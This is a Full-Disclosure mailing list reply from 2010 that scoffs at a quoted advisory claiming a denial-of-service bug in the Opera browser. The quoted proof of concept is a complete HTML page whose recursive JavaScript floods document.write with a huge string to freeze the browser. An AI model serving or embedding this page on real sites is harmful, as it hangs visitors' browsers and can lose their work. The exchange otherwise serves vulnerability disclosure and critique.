[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: [Full-disclosure] Opera (plenitude String )Denial of Service Exploit
- To: information security <informationhacker08@xxxxxxxxx>, full-disclosure@xxxxxxxxxxxxxxxxx
- Subject: Re: [Full-disclosure] Opera (plenitude String )Denial of Service Exploit
- From: Jeff Williams <jeffwillis30@xxxxxxxxx>
- Date: Wed, 3 Mar 2010 15:42:59 +1100
You gotta be joking, this is probably the 3000th DoS "advisory" for
document.write.
Guess what sparky, even Jeremy Brown didn't post that one.
Thus no surprise exploit-db post this kind of shit.
2010/3/3 information security <informationhacker08@xxxxxxxxx>
> ======================================================================
>
> Opera (plenitude String )Denial of Service Exploit
>
> =======================================================================
>
> by
>
> Asheesh Kumar Mani Tripathi
>
>
> # code by Asheesh kumar Mani Tripathi
>
> # email informationhacker08@xxxxxxxxx
>
> # company www.aksitservices.co.in
>
> # Credit by Asheesh Anaconda
>
>
> #Download http://www.opera.com/download/
>
>
> #Background
>
> Opera is a popular internet browser :)
>
> #Vulnerability
> This bug is a typical result when attacker try to write plenitude String in
> document.write() function .User interaction is required to
>
> exploit this vulnerability in that the target must visit a malicious
> web page.
>
>
>
> #Impact
> Browser doesn't respond any longer to any user input, all tabs are no
> longer accessible, your work if any might be lost.
>
>
>
> #Proof of concept
> copy the code in text file and save as "asheesh.html" open in Mozilla Firefox
>
> ========================================================================================================================
>
> asheesh.html
> ========================================================================================================================
>
> <html>
>
> <title>asheesh kumar mani tripathi</title>
> Asheesh kumar Mani Tripathi
> <head>
>
> <script>
>
>
>
> function asheesh ()
> {
> var i , anaconda = "XXXX"
> for(i=24;i >0 ;--i)
>
> {
> anaconda=anaconda+anaconda;
> }
>
> document.write(anaconda);
>
> asheesh();
>
> }
> asheesh();
>
> </script>
> </head>
>
> <body onLoad="asheesh()"></body>
>
> </html>
>
>
>
> ========================================================================================================================
> Why do you worry without cause? Whom do you fear without reason? Who can kill
> you?
>
> The soul is neither born, nor does it die.
>
>
> #If you have any questions, comments, or concerns, feel free to contact me.
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/